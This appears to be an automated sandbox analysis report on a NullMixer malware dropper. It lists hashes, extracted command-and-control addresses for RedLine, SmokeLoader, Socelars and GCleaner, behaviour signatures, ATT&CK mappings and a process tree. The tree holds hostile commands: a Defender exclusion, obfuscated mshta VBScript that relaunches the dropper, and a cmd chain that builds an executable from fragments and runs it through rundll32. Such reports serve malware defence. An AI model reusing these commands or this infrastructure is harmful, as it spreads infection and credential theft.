Analysis

  • max time kernel
    82s
  • max time network
    155s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240226-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system
  • submitted
    03-04-2024 19:37

General

  • Target

    a4d23ac3c7172b9aa02e35b6bf0fd21f_JaffaCakes118.exe

  • Size

    3.9MB

  • MD5

    a4d23ac3c7172b9aa02e35b6bf0fd21f

  • SHA1

    0326aab7deddfefc048c9a67ac9ce4ee14ea9003

  • SHA256

    9bd142ecfe89857de80bb3255a1655f680ca6451b45cca235096dc1c1285e806

  • SHA512

    9e425d8a1beaeabfc983bb75a7a5f8a8c0823e825e9f66e17b0f515b2897da9f2d9b2f1aa9939fdbae6c826c2c730d3bc772abec9e35a61d3d73a6cdb87ddf10

  • SSDEEP

    98304:JwOLAdLUm3WFTzOzZfkT2Ribt7xkk49JBLHInas2Xzr+:JwOcN3mWZfkTIibtik4honas6y

Malware Config

Extracted

Family

nullmixer

C2

http://hsiens.xyz/

Extracted

Family

socelars

C2

http://www.iyiqian.com/

http://www.hbgents.top/

http://www.rsnzhy.com/

http://www.znsjis.top/

Extracted

Family

smokeloader

Botnet

pub5

Extracted

Family

gcleaner

C2

ggg-cl.biz

45.9.20.13

Extracted

Family

redline

Botnet

she

C2

135.181.129.119:4805

Attributes
  • auth_value

    b69102cdbd4afe2d3159f88fb6dac731

Extracted

Family

smokeloader

Version

2020

C2

http://gmpeople.com/upload/

http://mile48.com/upload/

http://lecanardstsornin.com/upload/

http://m3600.com/upload/

http://camasirx.com/upload/

rc4.i32
rc4.i32

Extracted

Family

redline

Botnet

ANI

C2

45.142.215.47:27643

Attributes
  • auth_value

    9491a1c5e11eb6097e68a4fa8627fda8

Signatures

  • Detect Fabookie payload 1 IoCs
  • Fabookie

    Fabookie is facebook account info stealer.

  • GCleaner

    GCleaner is a Pay-Per-Install malware loader first discovered in early 2019.

  • NullMixer

    NullMixer is a malware dropper leading to an infection chain of a wide variety of malware families.

  • OnlyLogger

    A tiny loader that uses IPLogger to get its payload.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine payload 3 IoCs
  • SectopRAT

    SectopRAT is a remote access trojan first seen in November 2019.

  • SectopRAT payload 4 IoCs
  • SmokeLoader

    Modular backdoor trojan in use since 2014.

  • Socelars

    Socelars is an infostealer targeting browser cookies and credit card credentials.

  • Socelars payload 1 IoCs
  • OnlyLogger payload 3 IoCs
  • ASPack v2.12-2.42 3 IoCs

    Detects executables packed with ASPack v2.12-2.42

  • Checks computer location settings 2 TTPs 7 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 15 IoCs
  • Loads dropped DLL 10 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Drops Chrome extension 1 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 6 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Looks up geolocation information via web service

    Uses a legitimate geolocation service to find the infected system's geolocation info.

  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 10 IoCs
  • Checks SCSI registry key(s) 3 TTPs 3 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Kills process with taskkill 2 IoCs
  • Modifies data under HKEY_USERS 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 26 IoCs
  • Suspicious use of SendNotifyMessage 24 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Users\Admin\AppData\Local\Temp\a4d23ac3c7172b9aa02e35b6bf0fd21f_JaffaCakes118.exe
    "C:\Users\Admin\AppData\Local\Temp\a4d23ac3c7172b9aa02e35b6bf0fd21f_JaffaCakes118.exe"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:3744
    • C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
      "C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"
      2⤵
      • Checks computer location settings
      • Executes dropped EXE
      • Suspicious use of WriteProcessMemory
      PID:116
      • C:\Users\Admin\AppData\Local\Temp\7zS47025EC7\setup_install.exe
        "C:\Users\Admin\AppData\Local\Temp\7zS47025EC7\setup_install.exe"
        3⤵
        • Executes dropped EXE
        • Loads dropped DLL
        • Suspicious use of WriteProcessMemory
        PID:1188
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:4628
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
            5⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:4032
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c Sun152bab5a2de.exe
          4⤵
            PID:1920
            • C:\Users\Admin\AppData\Local\Temp\7zS47025EC7\Sun152bab5a2de.exe
              Sun152bab5a2de.exe
              5⤵
              • Executes dropped EXE
              PID:496
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /c Sun15901f2f025e.exe
            4⤵
            • Suspicious use of WriteProcessMemory
            PID:1852
            • C:\Users\Admin\AppData\Local\Temp\7zS47025EC7\Sun15901f2f025e.exe
              Sun15901f2f025e.exe
              5⤵
              • Executes dropped EXE
              • Drops Chrome extension
              • Suspicious use of AdjustPrivilegeToken
              PID:4024
              • C:\Windows\SysWOW64\cmd.exe
                cmd.exe /c taskkill /f /im chrome.exe
                6⤵
                  PID:2592
                  • C:\Windows\SysWOW64\taskkill.exe
                    taskkill /f /im chrome.exe
                    7⤵
                    • Kills process with taskkill
                    • Suspicious use of AdjustPrivilegeToken
                    PID:1584
                • C:\Program Files\Google\Chrome\Application\chrome.exe
                  "C:\Program Files\Google\Chrome\Application\chrome.exe"
                  6⤵
                  • Enumerates system info in registry
                  • Modifies data under HKEY_USERS
                  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
                  • Suspicious use of FindShellTrayWindow
                  • Suspicious use of SendNotifyMessage
                  PID:1436
                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffb01cd9758,0x7ffb01cd9768,0x7ffb01cd9778
                    7⤵
                      PID:2884
                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1660 --field-trial-handle=1884,i,15824966708709697068,5670455985190013454,131072 /prefetch:2
                      7⤵
                        PID:4716
                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2020 --field-trial-handle=1884,i,15824966708709697068,5670455985190013454,131072 /prefetch:8
                        7⤵
                          PID:2796
                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2104 --field-trial-handle=1884,i,15824966708709697068,5670455985190013454,131072 /prefetch:8
                          7⤵
                            PID:2284
                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3008 --field-trial-handle=1884,i,15824966708709697068,5670455985190013454,131072 /prefetch:1
                            7⤵
                              PID:488
                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3016 --field-trial-handle=1884,i,15824966708709697068,5670455985190013454,131072 /prefetch:1
                              7⤵
                                PID:2712
                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4516 --field-trial-handle=1884,i,15824966708709697068,5670455985190013454,131072 /prefetch:1
                                7⤵
                                  PID:3316
                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4868 --field-trial-handle=1884,i,15824966708709697068,5670455985190013454,131072 /prefetch:8
                                  7⤵
                                    PID:4372
                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5276 --field-trial-handle=1884,i,15824966708709697068,5670455985190013454,131072 /prefetch:8
                                    7⤵
                                      PID:1756
                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5376 --field-trial-handle=1884,i,15824966708709697068,5670455985190013454,131072 /prefetch:8
                                      7⤵
                                        PID:1636
                                • C:\Windows\SysWOW64\cmd.exe
                                  C:\Windows\system32\cmd.exe /c Sun15dbd675f871ca.exe
                                  4⤵
                                  • Suspicious use of WriteProcessMemory
                                  PID:3708
                                  • C:\Users\Admin\AppData\Local\Temp\7zS47025EC7\Sun15dbd675f871ca.exe
                                    Sun15dbd675f871ca.exe
                                    5⤵
                                    • Executes dropped EXE
                                    PID:4964
                                • C:\Windows\SysWOW64\cmd.exe
                                  C:\Windows\system32\cmd.exe /c Sun15f67075f27a2b5b.exe
                                  4⤵
                                    PID:3096
                                    • C:\Users\Admin\AppData\Local\Temp\7zS47025EC7\Sun15f67075f27a2b5b.exe
                                      Sun15f67075f27a2b5b.exe
                                      5⤵
                                      • Executes dropped EXE
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:432
                                  • C:\Windows\SysWOW64\cmd.exe
                                    C:\Windows\system32\cmd.exe /c Sun1577c3e159a3e3815.exe /mixone
                                    4⤵
                                    • Suspicious use of WriteProcessMemory
                                    PID:4780
                                    • C:\Users\Admin\AppData\Local\Temp\7zS47025EC7\Sun1577c3e159a3e3815.exe
                                      Sun1577c3e159a3e3815.exe /mixone
                                      5⤵
                                      • Executes dropped EXE
                                      PID:568
                                      • C:\Windows\SysWOW64\WerFault.exe
                                        C:\Windows\SysWOW64\WerFault.exe -u -p 568 -s 620
                                        6⤵
                                        • Program crash
                                        PID:640
                                      • C:\Windows\SysWOW64\WerFault.exe
                                        C:\Windows\SysWOW64\WerFault.exe -u -p 568 -s 640
                                        6⤵
                                        • Program crash
                                        PID:3372
                                      • C:\Windows\SysWOW64\WerFault.exe
                                        C:\Windows\SysWOW64\WerFault.exe -u -p 568 -s 732
                                        6⤵
                                        • Program crash
                                        PID:3120
                                      • C:\Windows\SysWOW64\WerFault.exe
                                        C:\Windows\SysWOW64\WerFault.exe -u -p 568 -s 800
                                        6⤵
                                        • Program crash
                                        PID:3128
                                      • C:\Windows\SysWOW64\WerFault.exe
                                        C:\Windows\SysWOW64\WerFault.exe -u -p 568 -s 768
                                        6⤵
                                        • Program crash
                                        PID:4836
                                      • C:\Windows\SysWOW64\WerFault.exe
                                        C:\Windows\SysWOW64\WerFault.exe -u -p 568 -s 652
                                        6⤵
                                        • Program crash
                                        PID:1252
                                      • C:\Windows\SysWOW64\WerFault.exe
                                        C:\Windows\SysWOW64\WerFault.exe -u -p 568 -s 1052
                                        6⤵
                                        • Program crash
                                        PID:4408
                                      • C:\Windows\SysWOW64\WerFault.exe
                                        C:\Windows\SysWOW64\WerFault.exe -u -p 568 -s 1060
                                        6⤵
                                        • Program crash
                                        PID:3008
                                      • C:\Windows\SysWOW64\WerFault.exe
                                        C:\Windows\SysWOW64\WerFault.exe -u -p 568 -s 1324
                                        6⤵
                                        • Program crash
                                        PID:3688
                                  • C:\Windows\SysWOW64\cmd.exe
                                    C:\Windows\system32\cmd.exe /c Sun15f1b1f8c669.exe
                                    4⤵
                                    • Suspicious use of WriteProcessMemory
                                    PID:1228
                                    • C:\Users\Admin\AppData\Local\Temp\7zS47025EC7\Sun15f1b1f8c669.exe
                                      Sun15f1b1f8c669.exe
                                      5⤵
                                      • Executes dropped EXE
                                      PID:2056
                                  • C:\Windows\SysWOW64\cmd.exe
                                    C:\Windows\system32\cmd.exe /c Sun159ff1acacf.exe
                                    4⤵
                                      PID:1172
                                      • C:\Users\Admin\AppData\Local\Temp\7zS47025EC7\Sun159ff1acacf.exe
                                        Sun159ff1acacf.exe
                                        5⤵
                                        • Executes dropped EXE
                                        • Suspicious use of SetThreadContext
                                        PID:3580
                                        • C:\Users\Admin\AppData\Local\Temp\7zS47025EC7\Sun159ff1acacf.exe
                                          C:\Users\Admin\AppData\Local\Temp\7zS47025EC7\Sun159ff1acacf.exe
                                          6⤵
                                          • Executes dropped EXE
                                          PID:404
                                    • C:\Windows\SysWOW64\cmd.exe
                                      C:\Windows\system32\cmd.exe /c Sun152bea652bd7232.exe
                                      4⤵
                                      • Suspicious use of WriteProcessMemory
                                      PID:4956
                                      • C:\Users\Admin\AppData\Local\Temp\7zS47025EC7\Sun152bea652bd7232.exe
                                        Sun152bea652bd7232.exe
                                        5⤵
                                        • Executes dropped EXE
                                        PID:1984
                                    • C:\Windows\SysWOW64\cmd.exe
                                      C:\Windows\system32\cmd.exe /c Sun1507db358fce61c0b.exe
                                      4⤵
                                      • Suspicious use of WriteProcessMemory
                                      PID:2508
                                      • C:\Users\Admin\AppData\Local\Temp\7zS47025EC7\Sun1507db358fce61c0b.exe
                                        Sun1507db358fce61c0b.exe
                                        5⤵
                                        • Executes dropped EXE
                                        • Checks SCSI registry key(s)
                                        • Suspicious behavior: EnumeratesProcesses
                                        • Suspicious behavior: MapViewOfSection
                                        PID:1688
                                    • C:\Windows\SysWOW64\cmd.exe
                                      C:\Windows\system32\cmd.exe /c Sun158d8ef840.exe
                                      4⤵
                                      • Suspicious use of WriteProcessMemory
                                      PID:2280
                                      • C:\Users\Admin\AppData\Local\Temp\7zS47025EC7\Sun158d8ef840.exe
                                        Sun158d8ef840.exe
                                        5⤵
                                        • Checks computer location settings
                                        • Executes dropped EXE
                                        PID:4508
                                        • C:\Windows\SysWOW64\mshta.exe
                                          "C:\Windows\System32\mshta.exe" VbsCRiPT: cLosE (CrEaTeOBJeCt ( "WScrIPT.SheLL" ).RuN ( "CMD.exe /c copy /y ""C:\Users\Admin\AppData\Local\Temp\7zS47025EC7\Sun158d8ef840.exe"" 09xU.exE && STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If """" =="""" for %U iN ( ""C:\Users\Admin\AppData\Local\Temp\7zS47025EC7\Sun158d8ef840.exe"" ) do taskkill /F -Im ""%~NxU"" " , 0 , tRUe) )
                                          6⤵
                                          • Checks computer location settings
                                          PID:2288
                                          • C:\Windows\SysWOW64\cmd.exe
                                            "C:\Windows\System32\cmd.exe" /c copy /y "C:\Users\Admin\AppData\Local\Temp\7zS47025EC7\Sun158d8ef840.exe" 09xU.exE && STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If "" =="" for %U iN ( "C:\Users\Admin\AppData\Local\Temp\7zS47025EC7\Sun158d8ef840.exe" ) do taskkill /F -Im "%~NxU"
                                            7⤵
                                              PID:5004
                                              • C:\Users\Admin\AppData\Local\Temp\09xU.exE
                                                09xU.EXE -pPtzyIkqLZoCarb5ew
                                                8⤵
                                                • Checks computer location settings
                                                • Executes dropped EXE
                                                PID:4372
                                                • C:\Windows\SysWOW64\mshta.exe
                                                  "C:\Windows\System32\mshta.exe" VbsCRiPT: cLosE (CrEaTeOBJeCt ( "WScrIPT.SheLL" ).RuN ( "CMD.exe /c copy /y ""C:\Users\Admin\AppData\Local\Temp\09xU.exE"" 09xU.exE && STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If ""-pPtzyIkqLZoCarb5ew "" =="""" for %U iN ( ""C:\Users\Admin\AppData\Local\Temp\09xU.exE"" ) do taskkill /F -Im ""%~NxU"" " , 0 , tRUe) )
                                                  9⤵
                                                  • Checks computer location settings
                                                  PID:4516
                                                  • C:\Windows\SysWOW64\cmd.exe
                                                    "C:\Windows\System32\cmd.exe" /c copy /y "C:\Users\Admin\AppData\Local\Temp\09xU.exE" 09xU.exE && STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If "-pPtzyIkqLZoCarb5ew " =="" for %U iN ( "C:\Users\Admin\AppData\Local\Temp\09xU.exE" ) do taskkill /F -Im "%~NxU"
                                                    10⤵
                                                      PID:2176
                                                  • C:\Windows\SysWOW64\mshta.exe
                                                    "C:\Windows\System32\mshta.exe" vbScRipT: cloSE ( creAteobjECT ( "WscriPT.SHell" ). RuN ( "cMd.exE /Q /r eCHO | SET /P = ""MZ"" > ScMeAP.SU & CoPY /b /Y ScMeAp.SU + 20L2VNO.2 + gUVIl5.SCH + 7TCInEJp.0 + yKIfDQA.1 r6f7sE.I & StART control .\R6f7sE.I " , 0 ,TRuE ) )
                                                    9⤵
                                                    • Checks computer location settings
                                                    PID:4856
                                                    • C:\Windows\SysWOW64\cmd.exe
                                                      "C:\Windows\System32\cmd.exe" /Q /r eCHO | SET /P = "MZ" > ScMeAP.SU &CoPY /b /Y ScMeAp.SU + 20L2VNO.2 + gUVIl5.SCH + 7TCInEJp.0 + yKIfDQA.1 r6f7sE.I& StART control .\R6f7sE.I
                                                      10⤵
                                                        PID:1956
                                                        • C:\Windows\SysWOW64\cmd.exe
                                                          C:\Windows\system32\cmd.exe /S /D /c" eCHO "
                                                          11⤵
                                                            PID:2072
                                                          • C:\Windows\SysWOW64\cmd.exe
                                                            C:\Windows\system32\cmd.exe /S /D /c" SET /P = "MZ" 1>ScMeAP.SU"
                                                            11⤵
                                                              PID:2432
                                                            • C:\Windows\SysWOW64\control.exe
                                                              control .\R6f7sE.I
                                                              11⤵
                                                                PID:4552
                                                                • C:\Windows\SysWOW64\rundll32.exe
                                                                  "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL .\R6f7sE.I
                                                                  12⤵
                                                                  • Loads dropped DLL
                                                                  PID:1092
                                                                  • C:\Windows\system32\RunDll32.exe
                                                                    C:\Windows\system32\RunDll32.exe Shell32.dll,Control_RunDLL .\R6f7sE.I
                                                                    13⤵
                                                                      PID:448
                                                                      • C:\Windows\SysWOW64\rundll32.exe
                                                                        "C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 .\R6f7sE.I
                                                                        14⤵
                                                                        • Loads dropped DLL
                                                                        PID:3036
                                                          • C:\Windows\SysWOW64\taskkill.exe
                                                            taskkill /F -Im "Sun158d8ef840.exe"
                                                            8⤵
                                                            • Kills process with taskkill
                                                            • Suspicious use of AdjustPrivilegeToken
                                                            PID:2364
                                                  • C:\Windows\SysWOW64\cmd.exe
                                                    C:\Windows\system32\cmd.exe /c Sun152e52d07b74d9b5.exe
                                                    4⤵
                                                      PID:4336
                                                      • C:\Users\Admin\AppData\Local\Temp\7zS47025EC7\Sun152e52d07b74d9b5.exe
                                                        Sun152e52d07b74d9b5.exe
                                                        5⤵
                                                        • Executes dropped EXE
                                                        • Suspicious use of AdjustPrivilegeToken
                                                        PID:4684
                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 1188 -s 600
                                                      4⤵
                                                      • Program crash
                                                      PID:4852
                                              • C:\Windows\SysWOW64\WerFault.exe
                                                C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 1188 -ip 1188
                                                1⤵
                                                  PID:3852
                                                • C:\Windows\SysWOW64\WerFault.exe
                                                  C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 568 -ip 568
                                                  1⤵
                                                    PID:3188
                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                    C:\Windows\SysWOW64\WerFault.exe -pss -s 492 -p 568 -ip 568
                                                    1⤵
                                                      PID:4768
                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                      C:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 568 -ip 568
                                                      1⤵
                                                        PID:2176
                                                      • C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe
                                                        "C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"
                                                        1⤵
                                                          PID:4172
                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                          C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 568 -ip 568
                                                          1⤵
                                                            PID:4204
                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                            C:\Windows\SysWOW64\WerFault.exe -pss -s 428 -p 568 -ip 568
                                                            1⤵
                                                              PID:1844
                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                              C:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 568 -ip 568
                                                              1⤵
                                                                PID:3292
                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 568 -ip 568
                                                                1⤵
                                                                  PID:1720
                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                  C:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 568 -ip 568
                                                                  1⤵
                                                                    PID:2720
                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                    C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 568 -ip 568
                                                                    1⤵
                                                                      PID:1956
                                                                    • C:\Users\Admin\AppData\Roaming\satctir
                                                                      C:\Users\Admin\AppData\Roaming\satctir
                                                                      1⤵
                                                                        PID:4768

                                                                      Network

                                                                      MITRE ATT&CK Matrix ATT&CK v13

                                                                      Credential Access

                                                                      Unsecured Credentials

                                                                      1
                                                                      T1552

                                                                      Credentials In Files

                                                                      1
                                                                      T1552.001

                                                                      Discovery

                                                                      Query Registry

                                                                      4
                                                                      T1012

                                                                      System Information Discovery

                                                                      4
                                                                      T1082

                                                                      Peripheral Device Discovery

                                                                      1
                                                                      T1120

                                                                      Collection

                                                                      Data from Local System

                                                                      1
                                                                      T1005

                                                                      Command and Control

                                                                      Web Service

                                                                      1
                                                                      T1102

                                                                      Replay Monitor

                                                                      Loading Replay Monitor...

                                                                      Downloads

                                                                      • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State
                                                                        Filesize

                                                                        945B

                                                                        MD5

                                                                        6824cfd47fc6bd5de3e1427834d9abaa

                                                                        SHA1

                                                                        fb5cae71c1c44b8094620877461a51fcea7b3b75

                                                                        SHA256

                                                                        05e22d3e7be4daccaa870dac1f36edc9fe8d3770aa0eb171a26ea83fb2846510

                                                                        SHA512

                                                                        4ce6034730d68b97548d097505612f2c48e0ce29ceeaca27171d7935485badb2250e46d8d1618666beae483c9aaa3cf5d560623e692dda8d7de0e380043426f0

                                                                      • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity
                                                                        Filesize

                                                                        371B

                                                                        MD5

                                                                        cabeb6e33cfbcdf7401294aa2996c7b9

                                                                        SHA1

                                                                        7db454d002b5a8d9235cb824564ca2420847794c

                                                                        SHA256

                                                                        9a89a119813126ae83d658989ffc23666f926973c6dec6fbbf258b87d1a4f9cd

                                                                        SHA512

                                                                        69e8030b3808cd90f97488df6169e21bc1c9c5795ce51af3cf53a14a73104a31c8b632e1d2b6d508cc1eebb80bcfc15953ba5869b15d12de9ebded953c86966c

                                                                      • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
                                                                        Filesize

                                                                        6KB

                                                                        MD5

                                                                        8d2181db5a2457b77d89ad5e048ed44a

                                                                        SHA1

                                                                        7cea78cc21e8d99fd977f8aaeb57b3147906e001

                                                                        SHA256

                                                                        0adc963ce4770b6bc367dc1365bfbb7bd93f3be54fc5844bd3df6a5156207e64

                                                                        SHA512

                                                                        e06caecfffbacf74db320f5a09f25c3727d144da468f3ba279855de21f8b9615c44ffd4f11b8655275a8465b497942f23296f785da26c6a4dd7866a4a93a52ca

                                                                      • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
                                                                        Filesize

                                                                        6KB

                                                                        MD5

                                                                        f85da9fb75d99a6798f43138ff84e9b3

                                                                        SHA1

                                                                        187bf5ec29b5329d84ec102052ee2dbd61830473

                                                                        SHA256

                                                                        67391e79cf0b17f133577b56811d22e1487043c613e6466c95bcbe1c724a5d49

                                                                        SHA512

                                                                        cebe23b6caf130c81a5e16b2f9f3eb9e8a07ffbffa2009b1733933dc6e8497fec5899e219a1ae713588f73c0a262c617e6e685115edbae2ccc9796bf8e6be69a

                                                                      • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences
                                                                        Filesize

                                                                        18KB

                                                                        MD5

                                                                        c22056362ba2aff0dd4c81dc64367a51

                                                                        SHA1

                                                                        509357154e1baef5a4d058b556781d577020db10

                                                                        SHA256

                                                                        5c9ef333b539a4fca415761cd66785e5ac20743b5883fa379e891ac929bf43ae

                                                                        SHA512

                                                                        09519882d3b22247b98e1c723fff39a9ed1cac6e1ecd92e2f23fd8c87e6f8fa92d609e506597a7ca12885c95ef407077c8417159e5940c8e2797280a7ca5bef5

                                                                      • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences
                                                                        Filesize

                                                                        18KB

                                                                        MD5

                                                                        adc555f83d153331a4174282622ffa4c

                                                                        SHA1

                                                                        7d5da7565472e54958e865eb31d3caf9a7c4c39f

                                                                        SHA256

                                                                        d53eacf40428cc78fefaf8dfe6b0331f84da9bc94dc3c8efd9e24d3c2e82dcd1

                                                                        SHA512

                                                                        0158ae7950dddcc82b93d887f4ac31c756dbecb473ab32b3ee61b06f66f2d5586378a63b0d311e8ce0f22d20d082c34e6a38117a9c2b765aebdfae271bc4c5a9

                                                                      • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State
                                                                        Filesize

                                                                        260KB

                                                                        MD5

                                                                        7f12cc026a09e52738b282cfd7e2ef76

                                                                        SHA1

                                                                        28e75dcf4de37c1534b61533111d2d4764666dc8

                                                                        SHA256

                                                                        699369a5b1cadf29f7f7692d769769b3912763139baad2baed11b5f6b1c54da7

                                                                        SHA512

                                                                        b540b51c58ef2a0e3fb7590b594e4a8311b7a94748049fa8b5ec7516c5ffb32a43c875a66cffa0bcf9d0fb96ec6bd78d1f24e7ea6cd67e5643b2fb18750f60fa

                                                                      • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\persisted_first_party_sets.json
                                                                        Filesize

                                                                        2B

                                                                        MD5

                                                                        99914b932bd37a50b983c5e7c90ae93b

                                                                        SHA1

                                                                        bf21a9e8fbc5a3846fb05b4fa0859e0917b2202f

                                                                        SHA256

                                                                        44136fa355b3678a1146ad16f7e8649e94fb4fc21fe77e8310c060f61caaff8a

                                                                        SHA512

                                                                        27c74670adb75075fad058d5ceaf7b20c4e7786c83bae8a32f626f9782af34c9a33c2046ef60fd2a7878d378e29fec851806bbd9a67878f3a9f1cda4830763fd

                                                                      • C:\Users\Admin\AppData\Local\Temp\20L2vNO.2
                                                                        Filesize

                                                                        474KB

                                                                        MD5

                                                                        4bf3493517977a637789c23464a58e06

                                                                        SHA1

                                                                        519b1fd3df0a243027c8cf4475e6b2cc19e1f1f4

                                                                        SHA256

                                                                        ccf0f8d1770436e1cd6cdcfa72d79a791a995a2f11d22bdf2b1e9bfbdd6f4831

                                                                        SHA512

